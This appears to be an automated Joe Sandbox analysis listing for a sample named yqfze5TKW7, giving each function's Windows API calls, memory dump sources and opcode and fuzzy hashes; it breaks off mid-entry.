Instruction Fuzzy Hash: 78516C35A00515DFCB40EFA4D981AAEBBF6EF49310F1484A9E809AB361CB31ED50CF64

Function 006AA056 Relevance: 7.6, APIs: 5, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dea4cda28c5dab004682f628e981d084c0401172dfd828254600c62c1af930bf
Instruction ID: 7ddce56e616f906edc444373e6c6eefef350fcc672d35dc3a286ea1c4f989b1f
Opcode Fuzzy Hash: dea4cda28c5dab004682f628e981d084c0401172dfd828254600c62c1af930bf
Instruction Fuzzy Hash: 16419135904214BBD720BFA8CC88FE9BBA6EB0B310F140166E816A73E1C730AD51DE52

Function 00622344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00622357
ScreenToClient.USER32(006E57B0,?), ref: 00622374
GetAsyncKeyState.USER32(00000001), ref: 00622399
GetAsyncKeyState.USER32(00000002), ref: 006223A7

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: f33ad86878a0c81305acc39e07d0918c41fc2bfde2dc3e4d91dd41f32b3a6d18
Instruction ID: e9ffb7fa928dc5c92ad80895d2c14433443af1740e9662db28d289bb8e3462ff
Opcode Fuzzy Hash: f33ad86878a0c81305acc39e07d0918c41fc2bfde2dc3e4d91dd41f32b3a6d18
Instruction Fuzzy Hash: 4E418F35604616FFCF15DF68C844AE9BBB6FB05361F20431AF828A22A0CB35AD54DF91

Function 006763AA Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 006763E7
TranslateAcceleratorW.USER32(?,?,?), ref: 00676433
TranslateMessage.USER32(?), ref: 0067645C
DispatchMessageW.USER32(?), ref: 00676466
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00676475

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Message$PeekTranslate$AcceleratorDispatch
String ID:
API String ID: 2108273632-0
Opcode ID: 5c814508b36d4a9215b65fdfe03baa6262442f89216969c1344117ff317109cf
Instruction ID: 5a9103cd786ae12ad75dd46fb06f2ab0ce1917ef0364de60e201cf52d23448a6
Opcode Fuzzy Hash: 5c814508b36d4a9215b65fdfe03baa6262442f89216969c1344117ff317109cf
Instruction Fuzzy Hash: 7B310730900B52AFDB64CFB0CC84BF67BEBAB01314F14E169F42AC62A4E7359849DB51

Function 00678A1F Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00678A30
PostMessageW.USER32(?,00000201,00000001), ref: 00678ADA
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00678AE2
PostMessageW.USER32(?,00000202,00000000), ref: 00678AF0
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00678AF8

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 17a293e38fd30ac223c6a6362da36a2aa3a8e96900f1689e4a1fdd364143848a
Instruction ID: 33fff4dca6ce22245742fe64476b7da2ed108ec4994cafc154b33fc197526965
Opcode Fuzzy Hash: 17a293e38fd30ac223c6a6362da36a2aa3a8e96900f1689e4a1fdd364143848a
Instruction Fuzzy Hash: 5031AD71500219EFDB14CFA8D94CADE3BA6EB05315F10822AF929E72D1CBB09D14DB91

Function 0067B1EC Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0067B204
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0067B221
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0067B259
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0067B27F
_wcsstr.LIBCMT ref: 0067B289

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: 0815e2bccd75cf34d14d756a7c2bef204e61dc6899fff7147fe878717a2e9d25
Instruction ID: 5b8b979c0051f1c00fdc95838d303637cf9552942e4ab5d48d0fa80378673ac9
Opcode Fuzzy Hash: 0815e2bccd75cf34d14d756a7c2bef204e61dc6899fff7147fe878717a2e9d25
Instruction Fuzzy Hash: EF2107316052017BEB155B759C09FBF7B9ADF4A710F00913DF808DA262EF71DD4196A1

Function 006AB14B Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 00622612: GetWindowLongW.USER32(?,000000EB), ref: 00622623

GetWindowLongW.USER32(?,000000F0), ref: 006AB192
SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 006AB1B7
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 006AB1CF
GetSystemMetrics.USER32(00000004), ref: 006AB1F8
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00690E90,00000000), ref: 006AB216

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: ff689dd7ea5ed982718ad31d979cb2d68aeb51ef7ffce75527b8e87387909db4
Instruction ID: 14a70783fdc27547c65386a6ad90ffc6f2289e8730457e2f3f829d09c75e26f8
Opcode Fuzzy Hash: ff689dd7ea5ed982718ad31d979cb2d68aeb51ef7ffce75527b8e87387909db4
Instruction Fuzzy Hash: A121A231910261AFCB10AF78DC14BAA37A6EB06321F145739B932C72E1E7309D618F90

Function 00679307 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00679320

Part of subcall function 00627BCC: _memmove.LIBCMT ref: 00627C06

SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00679352
__itow.LIBCMT ref: 0067936A
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00679392
__itow.LIBCMT ref: 006793A3

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: MessageSend$__itow$_memmove
String ID:
API String ID: 2983881199-0
Opcode ID: 5fadc526489b37c8cd817d411de08d67057949de972e5d154a784680420ac84d
Instruction ID: 42f7ea4b2874c3b240b60b9422b991be54c5bca2b66f8ba397eba19e7c1213d7
Opcode Fuzzy Hash: 5fadc526489b37c8cd817d411de08d67057949de972e5d154a784680420ac84d
Instruction Fuzzy Hash: D6210A31700214ABDB10AF609C85EEE7BEFEB49721F149029FD08D73D0D6708D458BA2

Function 00695A4D Relevance: 7.6, APIs: 5, Instructions: 70COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00695A6E
GetForegroundWindow.USER32 ref: 00695A85
GetDC.USER32(00000000), ref: 00695AC1
GetPixel.GDI32(00000000,?,00000003), ref: 00695ACD
ReleaseDC.USER32(00000000,00000003), ref: 00695B08

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 2d045b3e439f4bd427d076ddcfee59b966384366498d4100023c6f14871af822
Instruction ID: 479a542d50d65aa6b6c9706b2245b197eb7c8abd42db65bac18577d4a9609b0d
Opcode Fuzzy Hash: 2d045b3e439f4bd427d076ddcfee59b966384366498d4100023c6f14871af822
Instruction Fuzzy Hash: 1F219F35A00514AFDB14EFA4DC84A9ABBFAEF49311F148579F80AD7362CA30AC01CF95

Function 006212F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0062134D
SelectObject.GDI32(?,00000000), ref: 0062135C
BeginPath.GDI32(?), ref: 00621373
SelectObject.GDI32(?,00000000), ref: 0062139C

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 827cf4ac6ab7104531d867c7aaa04f0d2accea2e074b5e3809da3da22ad1ecbc
Instruction ID: 7239e933c2f858c415d7e813a079f86372aee02f73e813837c27c0406db8b8e2
Opcode Fuzzy Hash: 827cf4ac6ab7104531d867c7aaa04f0d2accea2e074b5e3809da3da22ad1ecbc
Instruction Fuzzy Hash: BF219230914B64EFDB10DF55EC847AA3BABFB12315F145225F8119E1B0D3B19891CF91

Function 00684A93 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00684ABA
__beginthreadex.LIBCMT ref: 00684AD8
MessageBoxW.USER32(?,?,?,?), ref: 00684AED
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00684B03
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00684B0A

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
String ID:
API String ID: 3824534824-0
Opcode ID: bcbd1510cd442f2925f11f12fa10459a2aa38536a9ec2355cb70e1c9539cc787
Instruction ID: 0346dc5b0f7df38151a4e58fa41c3c77279681e7c33286a720b96a0445d68135
Opcode Fuzzy Hash: bcbd1510cd442f2925f11f12fa10459a2aa38536a9ec2355cb70e1c9539cc787
Instruction Fuzzy Hash: 01114872904255BFCB00AFA89C44ADB7FAEEB45320F144369F914D3350DA71DD008BA1

Function 00678202 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0067821E
GetLastError.KERNEL32(?,00677CE2,?,?,?), ref: 00678228
GetProcessHeap.KERNEL32(00000008,?,?,00677CE2,?,?,?), ref: 00678237
HeapAlloc.KERNEL32(00000000,?,00677CE2,?,?,?), ref: 0067823E
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00678255

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 31808fea3b78362568ac7b059de5521957c93b88936778102e073ebb0362e9bc
Instruction ID: 28f711a27b05f99a7bc65ea952b723650ddb3de179a7a73116a0d1c6b7af6704
Opcode Fuzzy Hash: 31808fea3b78362568ac7b059de5521957c93b88936778102e073ebb0362e9bc
Instruction Fuzzy Hash: E3016D71340204BFDB205FA5DC4CDAB7BAEEF8A756B504469F819C3220DA319D00CEA1

Function 0067710A Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00677044,80070057,?,?,?,00677455), ref: 00677127
ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00677044,80070057,?,?), ref: 00677142
lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00677044,80070057,?,?), ref: 00677150
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00677044,80070057,?), ref: 00677160
CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00677044,80070057,?,?), ref: 0067716C

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: cc4c0562b9586d1c964ae1b56e87bdb6aba9b853e925eff5326da773e24f5c80
Instruction ID: d3ed7e1cd1b0fe4f5b921691bb1d356ab582e332171a708aee2bdf51f740258e
Opcode Fuzzy Hash: cc4c0562b9586d1c964ae1b56e87bdb6aba9b853e925eff5326da773e24f5c80
Instruction Fuzzy Hash: 25018F76601204BBDB119FA4DC44BAABBBEEF45791F188174FD08D2220EB75ED419BA0

Function 00685244 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00685260
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0068526E
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00685276
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00685280
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 006852BC

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: bcacbdf615ef50c92a3f32da3130bde13f040073f24789ce2c777d28d1d3475e
Instruction ID: 3115346dbbd497484259080957d41df098f9b903628a078826cd6deee1da16fa
Opcode Fuzzy Hash: bcacbdf615ef50c92a3f32da3130bde13f040073f24789ce2c777d28d1d3475e
Instruction Fuzzy Hash: F4011B31D01A19DBCF00FFE4D8599EDBB7ABB09711F400655E942B2241CF30AA558BA6

Function 0067810A Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00678121
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0067812B
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0067813A
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00678141
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00678157

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 1311948796382c99daebec635f2b2eb278ceea4c7b9aa43289895e135ca3f999
Instruction ID: 1049f9aceda63d90008d36ea58aa723583401cf35c66755c9655755fec57eb08
Opcode Fuzzy Hash: 1311948796382c99daebec635f2b2eb278ceea4c7b9aa43289895e135ca3f999
Instruction Fuzzy Hash: FEF03C71340305AFEB111FA5EC8CEA73BAEEF4A655B404025F94987250DF61AD41DE61

Function 0067C1E3 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 0067C1F7
GetWindowTextW.USER32(00000000,?,00000100), ref: 0067C20E
MessageBeep.USER32(00000000), ref: 0067C226
KillTimer.USER32(?,0000040A), ref: 0067C242
EndDialog.USER32(?,00000001), ref: 0067C25C

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 0a31858f4bade8da4385d8a2c5eda18ea2ac3f58b0378b1bb06135ee477eb542
Instruction ID: ce24bc1ef6a1f181eb702e8e122259d6e4b289dc46aed4aedf92e1d171c25a0c
Opcode Fuzzy Hash: 0a31858f4bade8da4385d8a2c5eda18ea2ac3f58b0378b1bb06135ee477eb542
Instruction Fuzzy Hash: E101A730404704ABEB206F90ED4EF96777ABB01706F00526DB596A14E1DBE07A448F51

Function 006213B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 006213BF
StrokeAndFillPath.GDI32(?,?,0065B888,00000000,?), ref: 006213DB
SelectObject.GDI32(?,00000000), ref: 006213EE
DeleteObject.GDI32 ref: 00621401
StrokePath.GDI32(?), ref: 0062141C

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 9129c746b1b2d7d448ffef3a139f3e61529b721a000de94a99798a19019e93a4
Instruction ID: 2182309962f9e797b251825a58ab19775bbd002e87afcfbd6ae7f02e378cf9d3
Opcode Fuzzy Hash: 9129c746b1b2d7d448ffef3a139f3e61529b721a000de94a99798a19019e93a4
Instruction Fuzzy Hash: 61F04430024B58DBDB156F56EC8C7593FE7AB1232AF08A224F46A4C1F1C77059A5DF11

Function 0068C397 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0068C432
CoCreateInstance.OLE32(006B2D6C,00000000,00000001,006B2BDC,?), ref: 0068C44A

Part of subcall function 00627DE1: _memmove.LIBCMT ref: 00627E22

CoUninitialize.OLE32 ref: 0068C6B7

Strings

.lnk, xrefs: 0068C3C6, 0068C3EE, 0068C3F8

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_memmove
String ID: .lnk
API String ID: 2683427295-24824748
Opcode ID: e8cae6f84eed0dc683b62094d33fb5f40a280b5796d23f073eff3bb9073a319a
Instruction ID: c7f58faf5b5d1aef0b0d2474e1199cff8c9671233a5dc67ba8e6c337c8509007
Opcode Fuzzy Hash: e8cae6f84eed0dc683b62094d33fb5f40a280b5796d23f073eff3bb9073a319a
Instruction Fuzzy Hash: 52A17B71104205AFD344EF54D881EABB7EAFF85354F004A2CF196871A2EB70EA49CF66

Function 00632CFB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

Part of subcall function 00640DB6: std::exception::exception.LIBCMT ref: 00640DEC
Part of subcall function 00640DB6: __CxxThrowException@8.LIBCMT ref: 00640E01

Part of subcall function 00627DE1: _memmove.LIBCMT ref: 00627E22

Part of subcall function 00627A51: _memmove.LIBCMT ref: 00627AAB

__swprintf.LIBCMT ref: 00632ECD

Strings

